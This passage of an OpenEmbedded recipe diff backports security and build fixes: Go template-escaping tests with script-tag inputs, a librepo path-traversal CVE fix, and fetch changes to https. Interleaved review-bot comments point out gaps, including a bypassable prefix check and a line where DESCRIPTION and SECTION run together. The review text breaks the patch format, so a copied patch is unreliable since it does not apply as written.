+- {float64(0.5), " 0.5 "},
+- {float64(-0.5), " -0.5 "},
+- {float64(0), " 0 "},
+- {math.Copysign(0, -1), " -0 "},
+- {"", `""`},
+- {"foo", `"foo"`},
++ {uint64(1)<<53 + 1, " 9007199254740993 ", false},
++ {float32(1.0), " 1 ", false},
++ {float32(-1.0), " -1 ", false},
++ {float32(0.5), " 0.5 ", false},
++ {float32(-0.5), " -0.5 ", false},
++ {float32(1.0) / float32(256), " 0.00390625 ", false},
++ {float32(0), " 0 ", false},
++ {math.Copysign(0, -1), " -0 ", false},
++ {float64(1.0), " 1 ", false},
++ {float64(-1.0), " -1 ", false},
++ {float64(0.5), " 0.5 ", false},
++ {float64(-0.5), " -0.5 ", false},
++ {float64(0), " 0 ", false},
++ {math.Copysign(0, -1), " -0 ", false},
++ {"", `""`, false},
++ {"foo", `"foo"`, false},
+ // Newlines.
+- {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
++ {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`, false},
+ // "\v" == "v" on IE 6 so use "\u000b" instead.
+- {"\t\x0b", `"\t\u000b"`},
+- {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+- {[]interface{}{}, "[]"},
+- {[]interface{}{42, "foo", nil}, `[42,"foo",null]`},
+- {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`},
+- {"<!--", `"\u003c!--"`},
+- {"-->", `"--\u003e"`},
+- {"<![CDATA[", `"\u003c![CDATA["`},
+- {"]]>", `"]]\u003e"`},
+- {"</script", `"\u003c/script"`},
+- {"\U0001D11E", "\"\U0001D11E\""}, // or "\uD834\uDD1E"
+- {nil, " null "},
++ {"\t\x0b", `"\t\u000b"`, false},
++ {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`, false},
++ {[]interface{}{}, "[]", false},
++ {[]interface{}{42, "foo", nil}, `[42,"foo",null]`, false},
++ {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`, false},
++ {"<!--", `"\u003c!--"`, false},
++ {"-->", `"--\u003e"`, false},
++ {"<![CDATA[", `"\u003c![CDATA["`, false},
++ {"]]>", `"]]\u003e"`, false},
++ {"</script", `"\u003c/script"`, false},
++ {"\U0001D11E", "\"\U0001D11E\"", false}, // or "\uD834\uDD1E"
++ {nil, " null ", false},
++ {&jsonErrType{}, " /* json: error calling MarshalJSON for type *template.jsonErrType: beep * / boop \\x3C/script blip \\x3C!-- */null ", true},
+ }
+
+ for _, test := range tests {
+ if js := jsValEscaper(test.x); js != test.js {
+ t.Errorf("%+v: want\n\t%q\ngot\n\t%q", test.x, test.js, js)
+ }
++ if test.skipNest {
++ continue
++ }
+ // Make sure that escaping corner cases are not broken
+ // by nesting.
+ a := []interface{}{test.x}
+--
+2.25.1
+
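Review bot: The two replacements added to jsValEscaper match only the exact lower-case strings `</script` and `<!--`, while HTML matches the script end tag without regard to case. An error message from a MarshalJSON method that carries a differently cased end tag would, as far as this hunk shows, pass through unescaped. Escaping every `<` in the error text covers both tokens in any casing: `errStr = strings.ReplaceAll(errStr, "<", "\\x3C")`. This goes beyond the upstream commit being backported, so it may be better raised upstream. jsValEscaper's body continues outside the patch's hunk.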
diff --git a/meta/recipes-devtools/go/go-crosssdk.inc b/meta/recipes-devtools/go/go-crosssdk.inc
index f0bec79719..36c9b12af8 100644
--- a/meta/recipes-devtools/go/go-crosssdk.inc
+++ b/meta/recipes-devtools/go/go-crosssdk.inc
@@ -4,6 +4,8 @@ DEPENDS = "go-native virtual/${TARGET_PREFIX}gcc-crosssdk virtual/nativesdk-${TA
PN = "go-crosssdk-${SDK_SYS}"
PROVIDES = "virtual/${TARGET_PREFIX}go-crosssdk"
+export GOCACHE = "${B}/.cache"
+
do_configure[noexec] = "1"
do_compile() {
diff --git a/meta/recipes-devtools/go/go-dep_0.5.4.bb b/meta/recipes-devtools/go/go-dep_0.5.4.bb
index 0da2c6607c..e29e53433e 100644
--- a/meta/recipes-devtools/go/go-dep_0.5.4.bb
+++ b/meta/recipes-devtools/go/go-dep_0.5.4.bb
@@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d"
GO_IMPORT = "github.com/golang/dep"
-SRC_URI = "git://${GO_IMPORT} \
+SRC_URI = "git://${GO_IMPORT};branch=master \
file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \
file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \
"
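Review bot: This SRC_URI gains `;branch=master` but still has no `protocol=` parameter, so the fetch stays on the plain git:// transport, which is neither encrypted nor authenticated. The libcomps and libdnf recipes changed in this same commit add `;protocol=https` alongside the branch. Suggest `SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https \`. If the recipe pins SRCREV (not visible in this hunk), that limits what a tampered fetch could substitute, but HTTPS removes the reliance on an unauthenticated channel.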
diff --git a/meta/recipes-devtools/go/go_1.14.bb b/meta/recipes-devtools/go/go_1.14.bb
index bc90a1329e..76ff788238 100644
--- a/meta/recipes-devtools/go/go_1.14.bb
+++ b/meta/recipes-devtools/go/go_1.14.bb
@@ -3,12 +3,12 @@ require go-target.inc
export GOBUILDMODE=""
export CGO_ENABLED_riscv64 = ""
-# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but mips/riscv
-# doesn't support -buildmode=pie, so skip the QA checking for mips/riscv and its
-# variants.
+# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but
+# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
+# for windows/mips/riscv and their variants.
python() {
- if 'mips' in d.getVar('TARGET_ARCH',True) or 'riscv' in d.getVar('TARGET_ARCH',True):
- d.appendVar('INSANE_SKIP_%s' % d.getVar('PN',True), " textrel")
+ if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
+ d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
else:
d.setVar('GOBUILDMODE', 'pie')
}
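Review bot: The added `'windows' in d.getVar('TARGET_GOOS')` raises a TypeError if the variable is unset, because getVar then returns None. Whether TARGET_GOOS is always defined by the time this anonymous function runs is not visible in the hunk. A guard such as `'windows' in (d.getVar('TARGET_GOOS') or '')` keeps recipe parsing from failing in that case.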
diff --git a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
index a60e851897..8e5f940deb 100644
--- a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
+++ b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
@@ -1,5 +1,6 @@
SUMMARY = "Program for creating simple man pages"
-SECTION = "devel"
+HOMEPAGE = "https://www.gnu.org/software/help2man/"
+DESCRIPTION = "help2man is a tool for automatically generating simple manual pages from program output."SECTION = "devel"
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
DEPENDS = "autoconf-native automake-native"
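Review bot: The added DESCRIPTION line runs straight into `SECTION = "devel"` with no line break. The hunk header (`-1,5 +1,6`) confirms the new file really has both on one line, so the separate SECTION assignment is gone. Depending on how the parser treats the line, DESCRIPTION either ends up containing `"SECTION = "devel` or the recipe fails to parse. Split it into `DESCRIPTION = "help2man is a tool for automatically generating simple manual pages from program output."` followed by `SECTION = "devel"` on its own line.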
diff --git a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
index c5761170aa..fc17e8d9b4 100644
--- a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
+++ b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Set of i2c tools for linux"
HOMEPAGE = "https://i2c.wiki.kernel.org/index.php/I2C_Tools"
+DESCRIPTION = "The i2c-tools package contains a heterogeneous set of I2C tools for Linux: a bus probing tool, a chip dumper, register-level SMBus access helpers, EEPROM decoding scripts, EEPROM programming tools, and a python module for SMBus access. All versions of Linux are supported, as long as I2C support is included in the kernel."
SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
index 304ad7fec0..ce4d73caf6 100644
--- a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
+++ b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
@@ -1,6 +1,7 @@
# Copyright (c) 2018 Joshua Watt, Garmin International,Inc.
# Released under the MIT license (see COPYING.MIT for the terms)
SUMMARY = "Generates Icecream toolchain for SDK"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${WORKDIR}/icecc-env.sh;beginline=2;endline=20;md5=dd6b68c1efed8a9fb04e409b3b287d47"
diff --git a/meta/recipes-devtools/intltool/intltool_0.51.0.bb b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
index ecff2faf25..592dbb92e2 100644
--- a/meta/recipes-devtools/intltool/intltool_0.51.0.bb
+++ b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
@@ -1,4 +1,6 @@
SUMMARY = "Utility scripts for internationalizing XML"
+HOMEPAGE = "https://launchpad.net/intltool"
+DESCRIPTION = "Utility scripts for internationalizing XML. This tool automatically extracts translatable strings from oaf, glade, bonobo ui, nautilus theme and other XML files into the po files."
SECTION = "devel"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
diff --git a/meta/recipes-devtools/jquery/jquery_3.5.0.bb b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
index 5c6f9cddbe..efffe05fd2 100644
--- a/meta/recipes-devtools/jquery/jquery_3.5.0.bb
+++ b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "jQuery is a fast, small, and feature-rich JavaScript library"
HOMEPAGE = "https://jquery.com/"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
SECTION = "devel"
LIC_FILES_CHKSUM = "file://${WORKDIR}/${BP}.js;startline=8;endline=10;md5=b1e67ece919e852643f1541a54492d65"
@@ -16,6 +17,11 @@ SRC_URI[map.sha256sum] = "3149351c8cbc3fb230bbf6188617c7ffda77d9e14333f4f5f0aa1a
UPSTREAM_CHECK_REGEX = "jquery-(?P<pver>\d+(\.\d+)+)\.js"
+# https://github.com/jquery/jquery/issues/3927
+# There are ways jquery can expose security issues but any issues are in the apps exposing them
+# and there is little we can directly do
+CVE_CHECK_WHITELIST += "CVE-2007-2379"
+
inherit allarch
do_install() {
diff --git a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
index 98c55dca85..d9e712f74a 100644
--- a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
+++ b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
@@ -1,8 +1,10 @@
SUMMARY = "Libcomps is alternative for yum.comps library (which is for managing rpm package groups)."
+HOMEPAGE = "https://github.com/rpm-software-management/libcomps"
+DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pure C as library and there's bindings for python2 and python3."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/rpm-software-management/libcomps.git \
+SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \
file://0001-Add-crc32.c-to-sources-list.patch \
file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
"
diff --git a/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
new file mode 100644
index 0000000000..61d255581b
--- /dev/null
+++ b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
@@ -0,0 +1,58 @@
+From b4c5a3312287f31a2075a235db846ff611586d2c Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:23 +0200
+Subject: [PATCH] Mark job goal.upgrade with sltr as targeted
+
+It allows to keep installed packages in upgrade set.
+
+It also prevents from reinstalling of modified packages with same NEVRA.
+
+
+Backport commit b4c5a3312287f31a2075a235db846ff611586d2c from
+https://github.com/rpm-software-management/libdnf
+
+This bug is present in oe-core's dnf
+
+Remove changes to spec file from upstream
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ libdnf.spec | 4 ++--
+ libdnf/goal/Goal.cpp | 2 +-
+ libdnf/goal/Goal.hpp | 6 ++++--
+ 3 files changed, 7 insertions(+), 5 deletions(-)
+
+diff --git a/libdnf/goal/Goal.cpp b/libdnf/goal/Goal.cpp
+index b69be19..a38cbb4 100644
+--- a/libdnf/goal/Goal.cpp
++++ b/libdnf/goal/Goal.cpp
+@@ -767,7 +767,7 @@ void
+ Goal::upgrade(HySelector sltr)
+ {
+ pImpl->actions = static_cast<DnfGoalActions>(pImpl->actions | DNF_UPGRADE);
+- sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE);
++ sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE|SOLVER_TARGETED);
+ }
+
+ void
+diff --git a/libdnf/goal/Goal.hpp b/libdnf/goal/Goal.hpp
+index f33dfa2..d701317 100644
+--- a/libdnf/goal/Goal.hpp
++++ b/libdnf/goal/Goal.hpp
+@@ -86,8 +86,10 @@ public:
+ /**
+ * @brief If selector ill formed, it rises std::runtime_error()
+ *
+- * @param sltr p_sltr: It should contain only upgrades with obsoletes otherwise it can try to
+- * reinstall installonly packages.
++ * @param sltr p_sltr: It contains upgrade-to packages and obsoletes. The presence of installed
++ * packages prevents reinstalling packages with the same NEVRA but changed contant. To honor repo
++ * priority all relevant packages must be present. To upgrade package foo from priority repo, all
++ * installed and available packages of the foo must be in selector plus obsoletes of foo.
+ */
+ void upgrade(HySelector sltr);
+ void userInstalled(DnfPackage *pkg);
+--
+2.7.4
+
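Review bot: The diffstat in this patch still lists `libdnf.spec | 4 ++--` and `3 files changed, 7 insertions(+), 5 deletions(-)`, although the description says the spec changes were removed and only the Goal.cpp and Goal.hpp diffs follow. Trimming the diffstat to the two remaining files keeps the header accurate. `Upstream-Status: Backport` could also carry the upstream reference in brackets, as the Go CVE patches in this commit do: `Upstream-Status: Backport [https://github.com/rpm-software-management/libdnf/commit/b4c5a3312287f31a2075a235db846ff611586d2c]`.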
diff --git a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
index 43de06e7f9..39858ad401 100644
--- a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
+++ b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
@@ -1,14 +1,17 @@
SUMMARY = "Library providing simplified C and Python API to libsolv"
+HOMEPAGE = "https://github.com/rpm-software-management/libdnf"
+DESCRIPTION = "This library provides a high level package-manager. It's core library of dnf, PackageKit and rpm-ostree. It's replacement for deprecated hawkey library which it contains inside and uses librepo under the hood."
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/libdnf \
+SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=master;protocol=https \
file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \
file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \
file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \
file://0001-Add-WITH_TESTS-option.patch \
file://0001-include-stdexcept-for-runtime_error.patch \
file://fix-deprecation-warning.patch \
+ file://0040-Mark-job-goal.upgrade-with-sltr-as-target.patch \
"
SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77"
diff --git a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
index 5409051d79..7d8560f3cc 100644
--- a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
+++ b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
@@ -1,4 +1,6 @@
SUMMARY = "C Library for manipulating module metadata files"
+HOMEPAGE = "https://github.com/fedora-modularity/libmodulemd"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=25a3927bff3ee4f5b21bcb0ed3fcd6bb"
diff --git a/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
new file mode 100644
index 0000000000..8f4c5b73bc
--- /dev/null
+++ b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
@@ -0,0 +1,55 @@
+From 6027d68337b537bf9a68cf810cf9b8e40dac22f8 Mon Sep 17 00:00:00 2001
+From: Jaroslav Rohel <jrohel@redhat.com>
+Date: Wed, 12 Aug 2020 08:35:28 +0200
+Subject: [PATCH] Validate path read from repomd.xml (RhBug:1868639)
+
+= changelog =
+msg: Validate path read from repomd.xml
+type: security
+resolves: https://bugzilla.redhat.com/show_bug.cgi?id=1868639
+
+Upstream-Status: Acepted [https://github.com/rpm-software-management/librepo/commit/7daea2a2429a54dad68b1de9b37a5f65c5cf2600]
+CVE: CVE-2020-14352
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ librepo/yum.c | 17 +++++++++++++++++
+ 1 file changed, 17 insertions(+)
+
+diff --git a/librepo/yum.c b/librepo/yum.c
+index 3059188..529257b 100644
+--- a/librepo/yum.c
++++ b/librepo/yum.c
+@@ -23,6 +23,7 @@
+ #define BITS_IN_BYTE 8
+
+ #include <stdio.h>
++#include <libgen.h>
+ #include <assert.h>
+ #include <stdlib.h>
+ #include <errno.h>
+@@ -770,6 +771,22 @@ prepare_repo_download_targets(LrHandle *handle,
+ continue;
+
+ char *location_href = record->location_href;
++
++ char *dest_dir = realpath(handle->destdir, NULL);
++ path = lr_pathconcat(handle->destdir, record->location_href, NULL);
++ char *requested_dir = realpath(dirname(path), NULL);
++ lr_free(path);
++ if (!g_str_has_prefix(requested_dir, dest_dir)) {
++ g_debug("%s: Invalid path: %s", __func__, location_href);
++ g_set_error(err, LR_YUM_ERROR, LRE_IO, "Invalid path: %s", location_href);
++ g_slist_free_full(*targets, (GDestroyNotify) lr_downloadtarget_free);
++ free(requested_dir);
++ free(dest_dir);
++ return FALSE;
++ }
++ free(requested_dir);
++ free(dest_dir);
++
+ gboolean is_zchunk = FALSE;
+ #ifdef WITH_ZCHUNK
+ if (handle->cachedir && record->header_checksum)
+--
+2.17.1
+
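Review bot: The containment test `g_str_has_prefix(requested_dir, dest_dir)` added to prepare_repo_download_targets() is a plain string-prefix compare, so a resolved directory that only shares the destination's leading characters (a sibling such as `<destdir>-other`) still passes. The check should also require that the character after the prefix is `/` or the end of the string. Both `realpath()` results are used without a NULL test, so an unresolvable directory reaches `g_str_has_prefix()` as NULL; an explicit `if (!dest_dir || !requested_dir)` branch taking the same error path would make the rejection deliberate rather than a side effect of GLib's argument checks. Separately, the header tag `Upstream-Status: Acepted [...]` is misspelled, and since it cites an upstream commit, `Upstream-Status: Backport [...]` matches the other backport in this diff. The function body continues outside the inner hunk.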
diff --git a/meta/recipes-devtools/librepo/librepo_1.11.2.bb b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
index 6a0a59f865..73a58f75e3 100644
--- a/meta/recipes-devtools/librepo/librepo_1.11.2.bb
+++ b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
@@ -1,11 +1,14 @@
SUMMARY = "A library providing C and Python (libcURL like) API \
for downloading linux repository metadata and packages."
+HOMEPAGE = "https://github.com/rpm-software-management/librepo"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/librepo.git \
+SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \
file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \
file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \
+ file://CVE-2020-14352.patch \
"
SRCREV = "67c2d1f83f1bf87be3f26ba730fce7fbdf0c9fba"
diff --git a/meta/recipes-devtools/libtool/libtool-2.4.6.inc b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
index 8e17b56d46..c8744e6d5f 100644
--- a/meta/recipes-devtools/libtool/libtool-2.4.6.inc
+++ b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
@@ -21,6 +21,10 @@ SRC_URI = "${GNU_MIRROR}/libtool/libtool-${PV}.tar.gz \
file://unwind-opt-parsing.patch \
file://0001-libtool-Fix-support-for-NIOS2-processor.patch \
file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \
+ file://0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch \
+ file://0001-Makefile.am-make-sure-autoheader-run-before-automake.patch \
+ file://lto-prefix.patch \
+ file://debian-no_hostname.patch \
"
SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e"
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
new file mode 100644
index 0000000000..2e9908725e
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
@@ -0,0 +1,35 @@
+From dfbbbd359e43e0a55fbea06f2647279ad8761cb9 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Wed, 24 Mar 2021 03:04:13 +0000
+Subject: [PATCH] Makefile.am: make sure autoheader run before autoconf
+
+autoheader will update ../libtool-2.4.6/libltdl/config-h.in which
+autoconf needs, so there comes a race sometimes as below:
+ | configure.ac:45: error: required file 'config-h.in' not found
+ | touch '../libtool-2.4.6/libltdl/config-h.in'
+
+So make sure autoheader run before autoconf to avoid this race.
+
+Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ Makefile.am | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile.am b/Makefile.am
+index 4142c90..fe1a9fc 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -365,7 +365,7 @@ lt_configure_deps = $(lt_aclocal_m4) $(lt_aclocal_m4_deps)
+ $(lt_aclocal_m4): $(lt_aclocal_m4_deps)
+ $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(ACLOCAL) -I ../m4
+
+-$(lt_configure): $(lt_configure_deps)
++$(lt_configure): $(lt_configure_deps) $(lt_config_h_in)
+ $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOCONF)
+
+ $(lt_config_h_in): $(lt_configure_deps)
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
new file mode 100644
index 0000000000..87f8492346
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
@@ -0,0 +1,35 @@
+From e82c06584f02e3e4487aa73aa05981e2a35dc6d1 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Tue, 13 Apr 2021 07:17:29 +0000
+Subject: [PATCH] Makefile.am: make sure autoheader run before automake
+
+When use automake to generate Makefile.in from Makefile.am, there
+comes below race:
+ | configure.ac:45: error: required file 'config-h.in' not found
+
+It is because the file config-h.in in updating process by autoheader,
+so make automake run after autoheader to avoid the above race.
+
+Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ Makefile.am | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile.am b/Makefile.am
+index 2752ecc..29950db 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -328,7 +328,7 @@ EXTRA_DIST += $(lt_aclocal_m4) \
+ $(lt_obsolete_m4) \
+ $(stamp_mk)
+
+-$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4)
++$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4) $(lt_config_h_in)
+ $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOMAKE) Makefile
+
+ # Don't let unused scripts leak into the libltdl Makefile
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/libtool/libtool/lto-prefix.patch b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
new file mode 100644
index 0000000000..2bd010b8e4
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
@@ -0,0 +1,22 @@
+If lto is enabled, we need the prefix-map variables to be passed to the linker.
+Add these to the list of options libtool passes through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libtool-2.4.6/build-aux/ltmain.in
+===================================================================
+--- libtool-2.4.6.orig/build-aux/ltmain.in
++++ libtool-2.4.6/build-aux/ltmain.in
+@@ -5424,9 +5424,10 @@ func_mode_link ()
+ # --sysroot=* for sysroot support
+ # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization
+ # -stdlib=* select c++ std lib with clang
++ # -f*-prefix-map* needed for lto linking
+ -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \
+ -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \
+- -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*)
++ -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*|-f*-prefix-map*)
+ func_quote_for_eval "$arg"
+ arg=$func_quote_for_eval_result
+ func_append compile_command " $arg"
diff --git a/meta/recipes-devtools/libtool/libtool_2.4.6.bb b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
index a5715faaa9..f5fdd00e5e 100644
--- a/meta/recipes-devtools/libtool/libtool_2.4.6.bb
+++ b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
@@ -1,6 +1,6 @@
require libtool-${PV}.inc
-SRC_URI += "file://multilib.patch file://debian-no_hostname.patch"
+SRC_URI += "file://multilib.patch"
RDEPENDS_${PN} += "bash"
diff --git a/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch b/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch
new file mode 100644
index 0000000000..20eea060b1
--- /dev/null
+++ b/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch
@@ -0,0 +1,31 @@
+From 86940d87026432683fb6741cd8a34d3b9b18e40d Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Fri, 27 Nov 2020 10:11:08 +0000
+Subject: [PATCH] AsmMatcherEmitter: sort ClassInfo lists by name as well
+
+Otherwise, there are instances which are identical in
+every other field and therefore sort non-reproducibly
+(which breaks binary and source reproducibiliy).
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ llvm/utils/TableGen/AsmMatcherEmitter.cpp | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/llvm/utils/TableGen/AsmMatcherEmitter.cpp b/llvm/utils/TableGen/AsmMatcherEmitter.cpp
+index ccf0959389b..1f801e83b7d 100644
+--- a/llvm/utils/TableGen/AsmMatcherEmitter.cpp
++++ b/llvm/utils/TableGen/AsmMatcherEmitter.cpp
+@@ -359,7 +359,10 @@ public:
+ // name of a class shouldn't be significant. However, some of the backends
+ // accidentally rely on this behaviour, so it will have to stay like this
+ // until they are fixed.
+- return ValueName < RHS.ValueName;
++ if (ValueName != RHS.ValueName)
++ return ValueName < RHS.ValueName;
++ // All else being equal, we should sort by name, for source and binary reproducibility
++ return Name < RHS.Name;
+ }
+ };
+
diff --git a/meta/recipes-devtools/llvm/llvm_git.bb b/meta/recipes-devtools/llvm/llvm_git.bb
index a8607f5008..de92cef1a4 100644
--- a/meta/recipes-devtools/llvm/llvm_git.bb
+++ b/meta/recipes-devtools/llvm/llvm_git.bb
@@ -30,10 +30,11 @@ LLVM_DIR = "llvm${LLVM_RELEASE}"
BRANCH = "release/${MAJOR_VERSION}.x"
SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05"
-SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \
